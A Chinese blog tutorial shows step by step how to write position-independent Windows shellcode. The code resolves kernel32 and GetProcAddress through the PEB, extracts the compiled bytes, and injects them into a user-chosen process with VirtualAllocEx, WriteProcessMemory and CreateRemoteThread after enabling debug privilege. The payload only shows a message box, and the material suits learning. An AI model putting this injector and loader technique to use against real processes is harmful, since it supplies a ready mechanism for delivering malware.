编写简单的shellcode
一、shellcode要求:放在任意位置都能运行
二、shellcode四大原则:
1、不能有全局变量
2、不能使用常量字符串
3、不能直接调用系统函数
4、不能嵌套调用其他函数
三、不同于之前的内存写入,shellcode不依赖于修复重定位表与IAT表.
四、shellcode编写的步骤
1、通过fs得到线程结构体Teb
2、偏移0x30得到进程结构体Peb
3、通过peb遍历得到Kernel32模块地址
4、再通过遍历导出表得到GetProcessAddress
5、得到MessageBoxA函数地址
五、坑点:1、一般vs和vc编译都会有堆栈检查机制的函数,这些函数不符合shellcode编写的四大原则,我们可以在vs下进行设置,之后我们的代码就不会有检查堆栈平衡的函数了
于此同时,基本时运行检查,运行库之类的要与上图保持一致
2、在winxp中遍历模块信息时,dll的名称是小写的,但在win10系统下dll的名字是大写的,写代码时注意下
3、创建数组的时候注意不要初始化
如图中,定义xchange数组时,我们给其进行了初始化为0,其直接执行了memset函数,这是不应该的
六、shellcode代码如下(弹出MessageBoxA窗口)
/******************************/
//shellcode四大原则 // //1、不能有全局变量 // //2、不能使用常量字符串 // //3、不能直接调用系统函数 // //4、不能嵌套调用其他函数 // /******************************/ /****************************************/ /* */ /*通过fs得到线程结构体Teb */ /*偏移0x30得到进程结构体Peb */ /*通过peb遍历得到Kernel32模块地址 */ /*再通过遍历导出表得到GetProcessAddress */ /*寻找MessageBoxA函数 */ /* */ /****************************************/ #include "stdafx.h" #include <windows.h> typedef struct _PEB_LDR_DATA { DWORD Length; bool Initialized; PVOID SsHandle; LIST_ENTRY InLoadOrderModuleList; LIST_ENTRY InMemoryOrderModuleList; LIST_ENTRY InInitializationOrderModuleList; } PEB_LDR_DATA,*PPEB_LDR_DATA; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, *PUNICODE_STRING; typedef struct _LDR_DATA_TABLE_ENTRY { LIST_ENTRY InLoadOrderLinks; //在这个结构体的子结构体中就包括了_LIST_ENTRY结构体// LIST_ENTRY InMemoryOrderLinks; LIST_ENTRY InInitializationOrderLinks; PVOID DllBase; PVOID EntryPoint; UINT32 SizeOfImage; UNICODE_STRING FullDllName; UNICODE_STRING BaseDllName; UINT32 Flags; USHORT LoadCount; USHORT TlsIndex; LIST_ENTRY HashLinks; PVOID SectionPointer; UINT32 CheckSum; UINT32 TimeDateStamp; PVOID LoadedImports; PVOID EntryPointActivationContext; PVOID PatchInformation; } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; void GetShellCode(); VOID PointCode(); int main(int argc, char* argv[]) { GetShellCode(); PointCode(); return 0; } void GetShellCode() { BOOL pan = FALSE; DWORD PEB; PPEB_LDR_DATA Peb_Ldr_Data; PLDR_DATA_TABLE_ENTRY Pldr_Data_Table_Entry; PLDR_DATA_TABLE_ENTRY Pldr_Data_Dai; DWORD KernelBase; DWORD AddrGetProcAddress; typedef HMODULE (WINAPI * PLOADLIBRARYA)(LPCSTR); //定义函数指针// PLOADLIBRARYA pLoadLibrary = NULL; typedef DWORD (WINAPI * PGETPROCADDRESS)(HMODULE, LPCSTR); PGETPROCADDRESS pGetProcAddress = NULL; typedef DWORD (WINAPI * PMESSAGEBOXA)(HWND, LPCSTR,LPCSTR,UINT); PMESSAGEBOXA pMessageBoxA = NULL; CHAR Kernel32dll[] = {'k','\0','e','\0','r','\0','n','\0','e','\0','l','\0','3','\0','2','\0','.','\0','d','\0','l','\0','l','\0','\0','\0'};//使用数组的形式表示字符串// //CHAR Kernel32dll[] = {'K','\0','E','\0','R','\0','N','\0','E','\0','L','\0','3','\0','2','\0','.','\0','D','\0','L','\0','L','\0','\0','\0'}; CHAR pGetProcAddr[] = {'G','e','t','P','r','o','c','A','d','d','r','e','s','s',0}; CHAR StrCode[] = {'H','E','L','L','O','W','O','R','L','D',0}; CHAR pStrLoadLibrary[] = {'L','o','a','d','L','i','b','r','a','r','y','A',0}; CHAR Usr32dll[] = {'u','s','e','r','3','2','.','d','l','l','\0'} ; char pStrMessageBoxA[] = {'M','e','s','s','a','g','e','B','o','x','A',0}; __asm { mov eax,fs:[0x30] mov PEB,eax } Peb_Ldr_Data = (PPEB_LDR_DATA)*(PDWORD)(PEB + 0xc); Pldr_Data_Table_Entry = (PLDR_DATA_TABLE_ENTRY)(&Peb_Ldr_Data->InLoadOrderModuleList); //这个类型转化加&!!!!// Pldr_Data_Dai = (PLDR_DATA_TABLE_ENTRY)(Pldr_Data_Table_Entry->InLoadOrderLinks.Flink); Pldr_Data_Table_Entry = Pldr_Data_Dai; do { //if(*(Pldr_Data_Table_Entry->BaseDllName) == *Kernel32dll) break; int i = 0; CHAR* str1 = (CHAR*)Pldr_Data_Dai->BaseDllName.Buffer; while(((PWORD)str1)[i] && ((PWORD)Kernel32dll)[i]) { if(((PWORD)str1)[i] != ((PWORD)Kernel32dll)[i] && ((PWORD)str1)[i] != (((PWORD)Kernel32dll)[i] - 32) ) //预防vc下的小字母 { break; } i++; if(((PWORD)str1)[i]==0 && ((PWORD)Kernel32dll)[i] == 0) {pan = TRUE;KernelBase = (DWORD)Pldr_Data_Dai->DllBase;break; } } // printf("%s\n",Pldr_Data_Dai->BaseDllName.Buffer); Pldr_Data_Dai = (PLDR_DATA_TABLE_ENTRY)Pldr_Data_Dai->InLoadOrderLinks.Flink; }while((Pldr_Data_Table_Entry != Pldr_Data_Dai )&& (Pldr_Data_Table_Entry && Pldr_Data_Dai) && pan ==FALSE); //二通过导出表获得GetProcessAddress// PIMAGE_DOS_HEADER pDosHeader = (PIMAGE_DOS_HEADER)KernelBase; PIMAGE_NT_HEADERS pNTHeader = (PIMAGE_NT_HEADERS )((DWORD)pDosHeader + pDosHeader->e_lfanew); PIMAGE_FILE_HEADER pPEHeader = (PIMAGE_FILE_HEADER)((DWORD)pDosHeader + pDosHeader->e_lfanew + 4); PIMAGE_OPTIONAL_HEADER32 pOptionHeader = (PIMAGE_OPTIONAL_HEADER32)((DWORD)pPEHeader + sizeof(IMAGE_FILE_HEADER)); PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD)pOptionHeader + pPEHeader->SizeOfOptionalHeader); PIMAGE_EXPORT_DIRECTORY pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((DWORD)KernelBase + pOptionHeader->DataDirectory[0].VirtualAddress); PDWORD AddrOfFuns = (PDWORD)((DWORD)KernelBase + pExportDirectory->AddressOfFunctions); //导出函数地址表// PDWORD AddrOfNames = (PDWORD)((DWORD)KernelBase + pExportDirectory->AddressOfNames); PWORD AddressOfNameOridinals = (PWORD)((DWORD)KernelBase + pExportDirectory->AddressOfNameOrdinals); DWORD NumberOfFuncs = pExportDirectory->NumberOfFunctions; int ans = 0; BOOL Jan = FALSE; while(ans <= NumberOfFuncs && !Jan) { char* strName = (char *)(AddrOfNames[ans] + (DWORD)KernelBase); int t = 0; while(strName[t] && pGetProcAddr[t]) { if(strName[t] != pGetProcAddr[t]) break; else t++; if(!strName[t] && !pGetProcAddr[t]) { DWORD ordInArrFun = AddressOfNameOridinals[ans]; AddrGetProcAddress = AddrOfFuns[ordInArrFun] + KernelBase; Jan = TRUE; break; } } ans++; } pGetProcAddress = (PGETPROCADDRESS)AddrGetProcAddress;//(HMODULE, LPCSTR); pLoadLibrary = (PLOADLIBRARYA)pGetProcAddress((HMODULE )KernelBase,(LPCSTR)pStrLoadLibrary); DWORD hUser32 = (DWORD)pLoadLibrary((LPCSTR)Usr32dll); pMessageBoxA = (PMESSAGEBOXA)pGetProcAddress((HMODULE)hUser32,pStrMessageBoxA); pMessageBoxA(0,(LPCSTR)StrCode,0,MB_OK); return ; } //下面是我写了个函数来提取出硬编码// VOID PointCode() { printf("截取的shellcode是:\n"); printf("shellcode[] = {"); DWORD ThroughJmp = (DWORD)GetShellCode; ThroughJmp = *(PDWORD)(ThroughJmp + 1) + 5 + ThroughJmp;//获取其跳转的地址// CHAR* test2 = (CHAR*)ThroughJmp; for(int i = 0;i< 0x506;i++) //0x506// { DWORD TEST = test2[i]; TEST = TEST & 0x000000ff; printf("0x%x,",TEST); if(i % 20 == 0) printf("\n"); } printf("0xc3};"); printf("\n"); } //一开始的出错原因,因为vc与vs编译函数的时候生成堆栈检查代码//
七、得到提取的shellcode
八、检验运行
// 在winxp 下的vc++下编译,亲测,编译后的程序能在win10下运行
// 检验shellcode的执行性.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include <windows.h> void InjectShellCode(); BOOL EnableDebugPrivilege() { HANDLE hToken; BOOL fOk=FALSE; if(OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)) { TOKEN_PRIVILEGES tp; tp.PrivilegeCount=1; LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&tp.Privileges[0].Luid); tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL); fOk=(GetLastError()==ERROR_SUCCESS); CloseHandle(hToken); } return fOk; } int main(int argc, char* argv[]) { EnableDebugPrivilege();//不提权也能成功运行// InjectShellCode(); return 0; } void InjectShellCode() { BYTE shellcode[] = {0x55, 0x8b,0xec,0x81,0xec,0x10,0x1,0x0,0x0,0x53,0x56,0x57,0xc7,0x45,0xfc,0x0,0x0,0x0,0x0,0xc7,0x45, 0xe0,0x0,0x0,0x0,0x0,0xc7,0x45,0xdc,0x0,0x0,0x0,0x0,0xc7,0x45,0xd8,0x0,0x0,0x0,0x0,0xc6, 0x45,0xbc,0x6b,0xc6,0x45,0xbd,0x0,0xc6,0x45,0xbe,0x65,0xc6,0x45,0xbf,0x0,0xc6,0x45,0xc0,0x72,0xc6, 0x45,0xc1,0x0,0xc6,0x45,0xc2,0x6e,0xc6,0x45,0xc3,0x0,0xc6,0x45,0xc4,0x65,0xc6,0x45,0xc5,0x0,0xc6, 0x45,0xc6,0x6c,0xc6,0x45,0xc7,0x0,0xc6,0x45,0xc8,0x33,0xc6,0x45,0xc9,0x0,0xc6,0x45,0xca,0x32,0xc6, 0x45,0xcb,0x0,0xc6,0x45,0xcc,0x2e,0xc6,0x45,0xcd,0x0,0xc6,0x45,0xce,0x64,0xc6,0x45,0xcf,0x0,0xc6, 0x45,0xd0,0x6c,0xc6,0x45,0xd1,0x0,0xc6,0x45,0xd2,0x6c,0xc6,0x45,0xd3,0x0,0xc6,0x45,0xd4,0x0,0xc6, 0x45,0xd5,0x0,0xc6,0x45,0xac,0x47,0xc6,0x45,0xad,0x65,0xc6,0x45,0xae,0x74,0xc6,0x45,0xaf,0x50,0xc6, 0x45,0xb0,0x72,0xc6,0x45,0xb1,0x6f,0xc6,0x45,0xb2,0x63,0xc6,0x45,0xb3,0x41,0xc6,0x45,0xb4,0x64,0xc6, 0x45,0xb5,0x64,0xc6,0x45,0xb6,0x72,0xc6,0x45,0xb7,0x65,0xc6,0x45,0xb8,0x73,0xc6,0x45,0xb9,0x73,0xc6, 0x45,0xba,0x0,0xc6,0x45,0xa0,0x48,0xc6,0x45,0xa1,0x45,0xc6,0x45,0xa2,0x4c,0xc6,0x45,0xa3,0x4c,0xc6, 0x45,0xa4,0x4f,0xc6,0x45,0xa5,0x57,0xc6,0x45,0xa6,0x4f,0xc6,0x45,0xa7,0x52,0xc6,0x45,0xa8,0x4c,0xc6, 0x45,0xa9,0x44,0xc6,0x45,0xaa,0x0,0xc6,0x45,0x90,0x4c,0xc6,0x45,0x91,0x6f,0xc6,0x45,0x92,0x61,0xc6, 0x45,0x93,0x64,0xc6,0x45,0x94,0x4c,0xc6,0x45,0x95,0x69,0xc6,0x45,0x96,0x62,0xc6,0x45,0x97,0x72,0xc6, 0x45,0x98,0x61,0xc6,0x45,0x99,0x72,0xc6,0x45,0x9a,0x79,0xc6,0x45,0x9b,0x41,0xc6,0x45,0x9c,0x0,0xc6, 0x45,0x84,0x75,0xc6,0x45,0x85,0x73,0xc6,0x45,0x86,0x65,0xc6,0x45,0x87,0x72,0xc6,0x45,0x88,0x33,0xc6, 0x45,0x89,0x32,0xc6,0x45,0x8a,0x2e,0xc6,0x45,0x8b,0x64,0xc6,0x45,0x8c,0x6c,0xc6,0x45,0x8d,0x6c,0xc6, 0x45,0x8e,0x0,0xc6,0x85,0x78,0xff,0xff,0xff,0x4d,0xc6,0x85,0x79,0xff,0xff,0xff,0x65,0xc6,0x85,0x7a, 0xff,0xff,0xff,0x73,0xc6,0x85,0x7b,0xff,0xff,0xff,0x73,0xc6,0x85,0x7c,0xff,0xff,0xff,0x61,0xc6,0x85, 0x7d,0xff,0xff,0xff,0x67,0xc6,0x85,0x7e,0xff,0xff,0xff,0x65,0xc6,0x85,0x7f,0xff,0xff,0xff,0x42,0xc6, 0x45,0x80,0x6f,0xc6,0x45,0x81,0x78,0xc6,0x45,0x82,0x41,0xc6,0x45,0x83,0x0,0x64,0xa1,0x30,0x0,0x0, 0x0,0x89,0x45,0xf8,0x8b,0x45,0xf8,0x8b,0x48,0xc,0x89,0x4d,0xf4,0x8b,0x45,0xf4,0x83,0xc0,0xc,0x89, 0x45,0xf0,0x8b,0x45,0xf0,0x8b,0x8,0x89,0x4d,0xec,0x8b,0x45,0xec,0x89,0x45,0xf0,0xc7,0x85,0x74,0xff, 0xff,0xff,0x0,0x0,0x0,0x0,0x8b,0x45,0xec,0x8b,0x48,0x30,0x89,0x8d,0x70,0xff,0xff,0xff,0x8b,0x85, 0x74,0xff,0xff,0xff,0x8b,0x8d,0x70,0xff,0xff,0xff,0xf,0xb7,0x14,0x41,0x85,0xd2,0xf,0x84,0x9f,0x0, 0x0,0x0,0x8b,0x85,0x74,0xff,0xff,0xff,0xf,0xb7,0x4c,0x45,0xbc,0x85,0xc9,0xf,0x84,0x8c,0x0,0x0, 0x0,0x8b,0x85,0x74,0xff,0xff,0xff,0x8b,0x8d,0x70,0xff,0xff,0xff,0xf,0xb7,0x14,0x41,0x8b,0x85,0x74, 0xff,0xff,0xff,0xf,0xb7,0x4c,0x45,0xbc,0x3b,0xd1,0x74,0x24,0x8b,0x85,0x74,0xff,0xff,0xff,0x8b,0x8d, 0x70,0xff,0xff,0xff,0xf,0xb7,0x14,0x41,0x8b,0x85,0x74,0xff,0xff,0xff,0xf,0xb7,0x4c,0x45,0xbc,0x83, 0xe9,0x20,0x3b,0xd1,0x74,0x2,0xeb,0x49,0x8b,0x85,0x74,0xff,0xff,0xff,0x83,0xc0,0x1,0x89,0x85,0x74, 0xff,0xff,0xff,0x8b,0x85,0x74,0xff,0xff,0xff,0x8b,0x8d,0x70,0xff,0xff,0xff,0xf,0xb7,0x14,0x41,0x85, 0xd2,0x75,0x21,0x8b,0x85,0x74,0xff,0xff,0xff,0xf,0xb7,0x4c,0x45,0xbc,0x85,0xc9,0x75,0x12,0xc7,0x45, 0xfc,0x1,0x0,0x0,0x0,0x8b,0x45,0xec,0x8b,0x48,0x18,0x89,0x4d,0xe8,0xeb,0x5,0xe9,0x49,0xff,0xff, 0xff,0x8b,0x45,0xec,0x8b,0x8,0x89,0x4d,0xec,0x8b,0x45,0xf0,0x3b,0x45,0xec,0x74,0x16,0x83,0x7d,0xf0, 0x0,0x74,0x10,0x83,0x7d,0xec,0x0,0x74,0xa,0x83,0x7d,0xfc,0x0,0xf,0x84,0xd,0xff,0xff,0xff,0x8b, 0x45,0xe8,0x89,0x85,0x6c,0xff,0xff,0xff,0x8b,0x85,0x6c,0xff,0xff,0xff,0x8b,0x8d,0x6c,0xff,0xff,0xff, 0x3,0x48,0x3c,0x89,0x8d,0x68,0xff,0xff,0xff,0x8b,0x85,0x6c,0xff,0xff,0xff,0x8b,0x48,0x3c,0x8b,0x95, 0x6c,0xff,0xff,0xff,0x8d,0x44,0xa,0x4,0x89,0x85,0x64,0xff,0xff,0xff,0x8b,0x85,0x64,0xff,0xff,0xff, 0x83,0xc0,0x14,0x89,0x85,0x60,0xff,0xff,0xff,0x8b,0x85,0x64,0xff,0xff,0xff,0xf,0xb7,0x48,0x10,0x3, 0x8d,0x60,0xff,0xff,0xff,0x89,0x8d,0x5c,0xff,0xff,0xff,0x8b,0x85,0x60,0xff,0xff,0xff,0x8b,0x4d,0xe8, 0x3,0x48,0x60,0x89,0x8d,0x58,0xff,0xff,0xff,0x8b,0x85,0x58,0xff,0xff,0xff,0x8b,0x4d,0xe8,0x3,0x48, 0x1c,0x89,0x8d,0x54,0xff,0xff,0xff,0x8b,0x85,0x58,0xff,0xff,0xff,0x8b,0x4d,0xe8,0x3,0x48,0x20,0x89, 0x8d,0x50,0xff,0xff,0xff,0x8b,0x85,0x58,0xff,0xff,0xff,0x8b,0x4d,0xe8,0x3,0x48,0x24,0x89,0x8d,0x4c, 0xff,0xff,0xff,0x8b,0x85,0x58,0xff,0xff,0xff,0x8b,0x48,0x14,0x89,0x8d,0x48,0xff,0xff,0xff,0xc7,0x85, 0x44,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0xc7,0x85,0x40,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x8b,0x85, 0x44,0xff,0xff,0xff,0x3b,0x85,0x48,0xff,0xff,0xff,0xf,0x87,0xfc,0x0,0x0,0x0,0x83,0xbd,0x40,0xff, 0xff,0xff,0x0,0xf,0x85,0xef,0x0,0x0,0x0,0x8b,0x85,0x44,0xff,0xff,0xff,0x8b,0x8d,0x50,0xff,0xff, 0xff,0x8b,0x14,0x81,0x3,0x55,0xe8,0x89,0x95,0x3c,0xff,0xff,0xff,0xc7,0x85,0x38,0xff,0xff,0xff,0x0, 0x0,0x0,0x0,0x8b,0x85,0x3c,0xff,0xff,0xff,0x3,0x85,0x38,0xff,0xff,0xff,0xf,0xbe,0x8,0x85,0xc9, 0xf,0x84,0xa2,0x0,0x0,0x0,0x8b,0x85,0x38,0xff,0xff,0xff,0xf,0xbe,0x4c,0x5,0xac,0x85,0xc9,0xf, 0x84,0x8f,0x0,0x0,0x0,0x8b,0x85,0x3c,0xff,0xff,0xff,0x3,0x85,0x38,0xff,0xff,0xff,0xf,0xbe,0x8, 0x8b,0x95,0x38,0xff,0xff,0xff,0xf,0xbe,0x44,0x15,0xac,0x3b,0xc8,0x74,0x4,0xeb,0x6f,0xeb,0xf,0x8b, 0x85,0x38,0xff,0xff,0xff,0x83,0xc0,0x1,0x89,0x85,0x38,0xff,0xff,0xff,0x8b,0x85,0x3c,0xff,0xff,0xff, 0x3,0x85,0x38,0xff,0xff,0xff,0xf,0xbe,0x8,0x85,0xc9,0x75,0x46,0x8b,0x85,0x38,0xff,0xff,0xff,0xf, 0xbe,0x4c,0x5,0xac,0x85,0xc9,0x75,0x37,0x8b,0x85,0x44,0xff,0xff,0xff,0x8b,0x8d,0x4c,0xff,0xff,0xff, 0xf,0xb7,0x14,0x41,0x89,0x95,0x34,0xff,0xff,0xff,0x8b,0x85,0x34,0xff,0xff,0xff,0x8b,0x8d,0x54,0xff, 0xff,0xff,0x8b,0x14,0x81,0x3,0x55,0xe8,0x89,0x55,0xe4,0xc7,0x85,0x40,0xff,0xff,0xff,0x1,0x0,0x0, 0x0,0xeb,0x5,0xe9,0x47,0xff,0xff,0xff,0x8b,0x85,0x44,0xff,0xff,0xff,0x83,0xc0,0x1,0x89,0x85,0x44, 0xff,0xff,0xff,0xe9,0xf2,0xfe,0xff,0xff,0x8b,0x45,0xe4,0x89,0x45,0xdc,0x8d,0x45,0x90,0x50,0x8b,0x4d, 0xe8,0x51,0xff,0x55,0xdc,0x89,0x45,0xe0,0x8d,0x45,0x84,0x50,0xff,0x55,0xe0,0x89,0x85,0x30,0xff,0xff, 0xff,0x8d,0x85,0x78,0xff,0xff,0xff,0x50,0x8b,0x8d,0x30,0xff,0xff,0xff,0x51,0xff,0x55,0xdc,0x89,0x45, 0xd8,0x6a,0x0,0x6a,0x0,0x8d,0x45,0xa0,0x50,0x6a,0x0,0xff,0x55,0xd8,0x5f,0x5e,0x5b,0x8b,0xe5,0x5d, 0xc3}; DWORD dwShellcode = (DWORD)shellcode; DWORD PID ; HANDLE hProcess; DWORD Addr_hProcess; DWORD RecordCode; printf("请输入要注入进程的PID:\n"); scanf("%x",&PID); hProcess = OpenProcess(PROCESS_ALL_ACCESS,NULL,PID); //贴入代码// Addr_hProcess = (DWORD)VirtualAllocEx(hProcess,NULL,0x1000,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); WriteProcessMemory(hProcess,(LPVOID)Addr_hProcess,(LPVOID)dwShellcode,(0x2F1759- 0x2F1280 + 0x1),&RecordCode); CreateRemoteThread(hProcess,0,0,(LPTHREAD_START_ROUTINE)Addr_hProcess,NULL,0,0); printf("完成\n"); return ; }
九、
成功。。。
ps:该文借鉴了一些hambaga师傅对处理堆栈检查函数的操作
__EOF__
本文作者:_TLSN
本文链接:https://www.cnblogs.com/lordtianqiyi/articles/hambaga.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
本文链接:https://www.cnblogs.com/lordtianqiyi/articles/hambaga.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· AI与.NET技术实操系列:基于图像分类模型对图像进行分类
· go语言实现终端里的倒计时
· 如何编写易于单元测试的代码
· 10年+ .NET Coder 心语,封装的思维:从隐藏、稳定开始理解其本质意义
· .NET Core 中如何实现缓存的预热?
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 25岁的心里话
· ollama系列01:轻松3步本地部署deepseek,普通电脑可用
· 按钮权限的设计及实现